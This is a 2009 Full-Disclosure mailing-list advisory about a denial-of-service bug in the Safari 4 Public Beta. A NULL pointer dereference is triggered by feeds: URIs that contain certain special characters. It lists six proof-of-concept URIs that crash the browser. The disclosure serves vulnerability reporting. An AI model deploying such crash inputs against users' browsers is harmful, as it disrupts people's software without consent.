[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <49A5D63C.4020409@Gmail.com>
Date: Thu, 26 Feb 2009 01:37:32 +0200
From: Trancer <mtrancer@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple Safari 4 Beta feeds: URI NULL Pointer
Dereference Denial of, Service Vulnerability
Apple Safari 4 Beta feeds: URI NULL Pointer Dereference Denial of
Service Vulnerability
Date: Feb 25 2009
Class: Input Validation Error
Local: Yes
Remote: Yes
Vulnerable Versions:
* Apple Safari 4 (528.16) Public Beta
Note: MacOS X versions not tested.
Description:
Apple Safari is prone to a denial-of-service vulnerability, caused by a
NULL pointer defernce bug, because it fails to adequately sanitize
user-supplied input within afeeds: URI.
Attackers can exploit this issue to cause denial-of-service conditions
on a users computer and crash the Safari process.
Proof-of-Concept:
feeds:%&www.rec-sec.com/feed/
feeds:{&www.rec-sec.com/feed/
feeds:}&www.rec-sec.com/feed/
feeds:^&www.rec-sec.com/feed/
feeds:`&www.rec-sec.com/feed/
feeds:|&www.rec-sec.com/feed/
Any feeds: URI containing one of these characters will cause a
denial-of-service condition.
Disclosure:
Vendor has been informed.
Solution:
No solution.
Credit:
Trancer
http://www.rec-sec.com
--
Trancer
0nly Human.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists